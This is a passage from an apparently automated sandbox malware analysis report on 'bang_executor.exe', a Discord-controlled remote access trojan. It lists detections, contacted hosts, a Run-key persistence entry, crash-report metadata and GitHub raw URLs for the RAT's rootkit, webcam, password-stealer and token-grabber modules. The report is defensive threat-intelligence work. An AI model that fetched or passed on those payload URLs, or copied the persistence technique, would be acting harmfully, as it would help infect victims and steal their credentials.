              3 other processes (connect to gateway.discord.gg 162.159.136.234:443)
                bang_executor.exe
                  WerFault.exe
                3 other processes
          bang_executor.exe (second instance)
            WerFault.exe

          Sample detection

          Source | Detection | Scanner | Label
          bang_executor.exe | 100% | Joe Sandbox ML |

          Dropped file detection

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe | 48% | ReversingLabs | Win32.Trojan.Barys
          No Antivirus matches
          No Antivirus matches
          URL detection

          Source | Detection | Scanner | Label
          http://crl.microsoft | 0% | URL Reputation | safe
          http://crl.micros | 0% | URL Reputation | safe
          https://geolocation-db.com/json | 0% | Avira URL Cloud | safe
          https://discord.com/api/v9/channels/ | 0% | Avira URL Cloud | safe
          https://discord.com/api/v9/guilds/ | 0% | Avira URL Cloud | safe
          https://gateway.discord.gg/?v=9&encording=json | 0% | Avira URL Cloud | safe
          https://gateway.discord.gg/?v=9&encording=jsonX | 0% | Avira URL Cloud | safe
          http://gateway.discord.gg | 0% | Avira URL Cloud | safe
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d | 100% | Avira URL Cloud | malware
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll | 100% | Avira URL Cloud | malware
          https://gateway.discord.gg:443/?v=9&encording=json | 0% | Avira URL Cloud | safe
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte | 100% | Avira URL Cloud | malware
          https://gateway.discord.gg | 0% | Avira URL Cloud | safe
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll | 100% | Avira URL Cloud | malware
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra | 100% | Avira URL Cloud | malware
          Contacted domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          gateway.discord.gg | 162.159.136.234 | true | false | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          https://gateway.discord.gg/?v=9&encording=json | false | Avira URL Cloud: safe | unknown
          URLs from memory and binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://geolocation-db.com/json | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: safe | unknown
          https://file.io/ | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr | false | | high
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: malware | unknown
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: malware | unknown
          http://crl.microsoft | bang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: malware | unknown
          https://gateway.discord.gg:443/?v=9&encording=json | bang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://upx.sf.net | Amcache.hve.25.dr | false | | high
          http://gateway.discord.gg | bang_executor.exe, 00000003.00000002.1775906377.00000230000B5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87F05000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D715000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B65000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://gateway.discord.gg | bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: malware | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | bang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, executer.exe, 00000004.00000002.1629460687.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://discord.com/api/v9/channels/ | bang_executor.exe.0.dr | false | Avira URL Cloud: safe | unknown
          https://gateway.discord.gg/?v=9&encording=jsonX | bang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://discord.com/api/v9/guilds/ | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: safe | unknown
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.dr | false | Avira URL Cloud: malware | unknown
          http://crl.micros | bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://www.google.com/maps/place/ | bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.dr | false | | high
          Contacted IPs

          IP | Domain | Country | ASN | ASN Name | Malicious
          162.159.136.234 | gateway.discord.gg | United States | 13335 | CLOUDFLARENETUS | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1393035
                    Start date and time:2024-02-15 18:14:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of new started processes analysed:38
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:bang_executor.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@45/30@1/1
                    EGA Information:
                    • Successful, ratio: 16.7%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 166
                    • Number of non-executed functions: 96
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target bang_executor.exe, PID 1236 because it is empty
                    • Execution Graph export aborted for target bang_executor.exe, PID 7356 because it is empty
                    • Execution Graph export aborted for target bang_executor.exe, PID 7572 because it is empty
                    • Execution Graph export aborted for target bang_executor.exe, PID 7968 because it is empty
                    • Execution Graph export aborted for target executer.exe, PID 2228 because it is empty
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: bang_executor.exe
Time | Type | Description
17:14:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bang_executor C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
17:14:59 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bang_executor C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
18:14:50 | API Interceptor | 1x Sleep call for process: bang_executor.exe modified
18:14:52 | API Interceptor | 22x Sleep call for process: powershell.exe modified
18:15:04 | API Interceptor | 4x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
162.159.136.234 | noway-2D8EB.exe | Get hash | malicious | Dicrord Rat | Browse |
| SecuriteInfo.com.Exploit.Shell.29354.24275.exe | Get hash | malicious | Unknown | Browse |
| SecuriteInfo.com.Exploit.Shell.29354.24275.exe | Get hash | malicious | Unknown | Browse |
| 1EdVSOmvh0.exe | Get hash | malicious | Dicrord Rat | Browse |
| YEM2yTzOK9.exe | Get hash | malicious | Dicrord Rat | Browse |
| https://pub-6fbff04eeb6c444fa79c22c8c01d96e2.r2.dev/loginonlinemicrosoffice.html | Get hash | malicious | Unknown | Browse |
| http://binaecn.com | Get hash | malicious | Unknown | Browse |
| XQDo1PTnRJ.exe | Get hash | malicious | Unknown | Browse |
| downloader.exe | Get hash | malicious | Discord Token Stealer | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
gateway.discord.gg | LLR SETUP OP.exe | Get hash | malicious | Python Stealer, Discord Token Stealer | Browse | 162.159.134.234
| noway-2D8EB.exe | Get hash | malicious | Dicrord Rat | Browse | 162.159.136.234
| noway-2D8EB.exe | Get hash | malicious | Dicrord Rat | Browse | 162.159.133.234
| aBtQ4Tt70g.exe | Get hash | malicious | Dicrord Rat | Browse | 162.159.133.234
| aBtQ4Tt70g.exe | Get hash | malicious | Dicrord Rat | Browse | 162.159.135.234
| SecuriteInfo.com.Python.Agent-LZ.20719.17498.exe | Get hash | malicious | Python Stealer, Discord Token Stealer | Browse | 162.159.135.234
| tools.exe | Get hash | malicious | Dicrord Rat | Browse | 162.159.134.234
| tools.exe | Get hash | malicious | Dicrord Rat | Browse | 162.159.134.234
| iostream.exe | Get hash | malicious | Binder HackTool, Blank Grabber, Dicrord Rat, Quasar | Browse | 162.159.135.234
| Free_Nitro.exe | Get hash | malicious | Python Stealer, Blank Grabber, Discord Token Stealer | Browse | 162.159.134.234
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | https://firrifm.com/MzkxaDz6MDkxTzd1OFU= | Get hash | malicious | Unknown | Browse | 1.1.1.1
| https://get.clipclip.com/ClipClipSetup.exe | Get hash | malicious | Unknown | Browse | 172.67.69.95
| https://kiddushes.com/0/0/0/8e76d9aee5809553ad6668c7bfbfd114/oth23 | Get hash | malicious | Phisher | Browse | 104.21.80.104
| AntiDOT.exe | Get hash | malicious | LummaC | Browse | 172.67.154.29
| 1.exe | Get hash | malicious | LummaC, Remcos | Browse | 104.21.4.139
| http://yg5sjx5kzy.com | Get hash | malicious | Unknown | Browse | 104.19.219.90
| http://yg5sjx5kzy.com | Get hash | malicious | Unknown | Browse | 104.19.218.90
| PO20152024.scr.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 104.26.13.205
| New Order PO# 2047576-PR1936569,pdf.exe | Get hash | malicious | AgentTesla | Browse | 104.21.57.121
| International Bank Transfer.exe | Get hash | malicious | FormBook | Browse | 172.67.190.93
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | PO20152024.scr.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 162.159.136.234
| CV Mariana Alvarez.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 162.159.136.234
| mwcPF1EpU6.exe | Get hash | malicious | DCRat | Browse | 162.159.136.234
| rProdutos_Digitalizados.pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 162.159.136.234
| rFxu4PWpaCC68iKa.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 162.159.136.234
| INV2024020090.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 162.159.136.234
| Boyle and Summers document 2024 (4).xls | Get hash | malicious | HTMLPhisher | Browse | 162.159.136.234
| Omvpbu.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 162.159.136.234
| Abotihy.exe | Get hash | malicious | Phemedrone Stealer | Browse | 162.159.136.234
| BUNQ00009082342624.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 162.159.136.234
                                      No context
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1758683299192885
                                      Encrypted:false
                                      SSDEEP:192:hrrPZYP08rLVrqxa2Qdl/N6fmzuiF6Z24lO8GB:NrPZr8rLVkaL/gfmzuiF6Y4lO8W
                                      MD5:35A8D8B5FFF63F0C165575B6464DCAC2
                                      SHA1:C0C58CA72CE171651CC60EA23D43037138E2DEF3
                                      SHA-256:5EC0C7D4FACBDA19EEACAC615A3BAE0AF58D79393CE6303F8A9E4E3D354FE8BF
                                      SHA-512:5F2D3EF3C4643FAED7F0C04F82691110F61A93B3388700108906FD79A92997E416E6250812D0A386362BECFB50F70953D20EB6D2DD0A4066C168996C12F8A7FD
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.2.7.4.4.3.7.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.3.9.4.7.5.0.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.b.a.6.5.6.c.-.7.e.1.7.-.4.9.b.1.-.8.f.7.f.-.b.0.6.2.6.1.2.a.9.b.9.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.0.4.c.b.4.6.-.0.c.7.f.-.4.a.3.0.-.b.e.f.d.-.d.f.0.7.a.7.e.5.6.e.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.d.4.-.0.0.0.1.-.0.0.1.4.-.c.3.6.f.-.9.8.7.b.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1696374456947438
                                      Encrypted:false
                                      SSDEEP:192:RXJB6KYP08rLVrqxaKTzlT0NjrzuiF6Z24lO8GB:fBvr8rLVkasxAjrzuiF6Y4lO8W
                                      MD5:9C35D7F324E701F99A44AE5FCBDCC7F7
                                      SHA1:7C3C8E588A95F4023769C1493F2CB0822E6EDD9E
                                      SHA-256:0D307C471A153A8B722E343B099F411D6A26B13282B284608EBF49B6C40A852C
                                      SHA-512:FFC232DD1593E43102AEF51B8724671BF85E90C5BE9D603CECEE5919C3B7993BE99093BED6C41678C6C445E1193D3E83166596CF012ED5146F391FD23462A29F
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.2.8.3.7.2.6.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.4.0.8.7.2.8.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.a.9.0.c.f.5.-.a.7.b.3.-.4.6.1.f.-.b.3.3.c.-.9.b.4.6.9.0.e.e.e.0.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.8.f.5.d.7.d.-.3.b.3.9.-.4.5.c.e.-.8.0.4.e.-.1.8.6.7.4.f.9.5.7.b.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.4.-.0.0.0.1.-.0.0.1.4.-.2.8.6.f.-.5.e.7.c.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1695786632423242
                                      Encrypted:false
                                      SSDEEP:192:MXdxYP08rLVrqxaiTzlT0NjrzuiF6Z24lO8GB:kdxr8rLVkakxAjrzuiF6Y4lO8W
                                      MD5:E89F991711C137DB69D130CE3E20BC40
                                      SHA1:D75641FF61E9FF566323927A3BC55AAAEFCEB1A9
                                      SHA-256:BBAE25ABE7DF5093CE39BE8105D1B27C94F3D3FD6B55585F4E9D25B5E00E806F
                                      SHA-512:FE5BA2E55AC73855A992D1274BC75D357DC0F788150486AC68A970487D96D1F0C00CE6D41CBEB22765390509D8340AB819CA018E5D51E4F0B08EC20A6ACDA21A
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.0.3.6.7.8.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.1.3.2.0.9.6.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.7.0.3.8.e.e.-.d.f.9.2.-.4.7.8.4.-.b.5.0.3.-.4.f.a.3.9.7.f.e.b.8.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.6.b.1.1.0.b.-.8.b.1.c.-.4.9.8.2.-.9.6.5.4.-.2.3.0.1.8.1.9.c.c.9.4.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.c.-.0.0.0.1.-.0.0.1.4.-.e.a.5.9.-.2.2.8.1.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.169538869804829
                                      Encrypted:false
                                      SSDEEP:192:C5Gf6YP08rLVrqxaqDzlT0NjrzuiF6Z24lO8GB:IGf6r8rLVkaMxAjrzuiF6Y4lO8W
                                      MD5:7DD183A3B7EEE3AAB2CF18239E4781D5
                                      SHA1:0386577393EC5C0583F7ABD4F95E6FC7D49EB6A7
                                      SHA-256:9FA55904790E18B21BB27A746376089535B16B59B5D68057A5B38978EC50AE62
                                      SHA-512:F7C2EBF565A257A1AC44FDA779E82D110CCA7CE02F94C609F8B5D0C7669875D7F91AF57F56774D9EC0EFBB2A14F3E6236303DC289E9B9DC0760A1C324DDF96E9
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.8.9.3.6.9.4.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.9.6.8.6.9.5.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.e.6.0.c.1.-.4.5.2.9.-.4.a.a.3.-.9.3.4.e.-.b.9.3.5.c.f.3.9.6.7.5.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.5.0.7.b.0.8.-.f.b.3.b.-.4.8.b.b.-.9.f.6.d.-.a.e.4.c.6.2.4.6.a.a.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.0.-.0.0.0.1.-.0.0.1.4.-.c.1.a.4.-.4.0.8.6.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:14:53 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):559323
                                      Entropy (8bit):2.874649603920775
                                      Encrypted:false
                                      SSDEEP:3072:AkoOgRwcSjSze1CCqKi6wl3+vVPPP32oVmfyBOXpIymdSZ+Ovvy2HlL4J4SfIj/w:Aiq8NqD6wl3Qd3qHlctSxRqN
                                      MD5:5D28376434E3298054540937E8FB03A6
                                      SHA1:2F42F47BDF1B0A24A7E4F0B6A336E2AC585733C0
                                      SHA-256:F512FB78F8481485AF72432DE668695A88C1B702CF662712DA5F2A8D1C602022
                                      SHA-512:1577D9B03BF29B9BDEC226BA1C81302F08E2914CC1DCBEE18CC2F83D224891D3FE5472C1935F6D6BBBF78E9A03D99D52D2C4F0187691938FA1D32454CF5A336E
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<....)..........H).......?..............l.......8...........T............[...-..........T4..........@6..............................................................................eJ.......6......Lw......................T............F.e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:14:53 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):554753
                                      Entropy (8bit):2.90085272752717
                                      Encrypted:false
